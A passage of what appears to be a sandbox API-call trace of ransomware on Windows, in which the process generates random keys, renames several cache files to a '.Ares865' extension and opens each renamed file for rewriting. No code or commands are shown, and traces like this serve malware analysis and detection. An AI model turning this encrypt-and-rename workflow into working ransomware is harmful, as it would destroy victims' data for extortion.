pbBuffer=0x2ccce68) returned 1 [0110.075] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.078] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.078] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.078] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.079] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.Ares865") returned 123 [0110.079] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.ares865"), dwFlags=0x1) returned 1 [0110.080] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.080] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=342) returned 1 [0110.080] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.081] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.081] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.081] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.084] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.085] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.085] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.085] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.Ares865") returned 156 [0110.085] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.ares865"), dwFlags=0x1) returned 1 [0110.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.087] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=404) returned 1 [0110.087] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.087] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.087] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.087] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.088] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.088] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.092] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.092] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.092] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.093] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.Ares865") returned 156 [0110.093] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.ares865"), dwFlags=0x1) returned 1 [0110.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.095] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=390) returned 1 [0110.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.095] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.096] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.096] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.099] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.100] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.100] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.100] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.Ares865") returned 156 [0110.100] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.ares865"), dwFlags=0x1) returned 1 [0110.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.102] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=386) returned 1 [0110.102] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.103] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.103] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.103] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.106] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.107] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.107] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.107] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.Ares865") returned 156 [0110.107] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.ares865"), dwFlags=0x1) returned 1 [0110.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.109] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=386) returned 1 [0110.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.109] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.110] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.110] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.113] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.113] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.114] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.114] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.Ares865") returned 156 [0110.114] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.ares865"), dwFlags=0x1) returned 1 [0110.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.116] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=430) returned 1 [0110.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.116] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.117] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.117] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.121] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.121] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.122] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.122] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.Ares865") returned 156 [0110.122] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.ares865"), dwFlags=0x1) returned 1 [0110.124] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.124] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=492) returned 1 [0110.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.125] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.126] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.126] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.128] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.129] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.129] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.130] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.Ares865") returned 156 [0110.130] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.ares865"), dwFlags=0x1) returned 1 [0110.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.131] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=416) returned 1 [0110.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.132] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.132] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.132] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.142] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.143] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.143] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.144] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.Ares865") returned 156 [0110.144] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.ares865"), dwFlags=0x1) returned 1 [0110.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.146] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=416) returned 1 [0110.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.146] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.147] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.147] 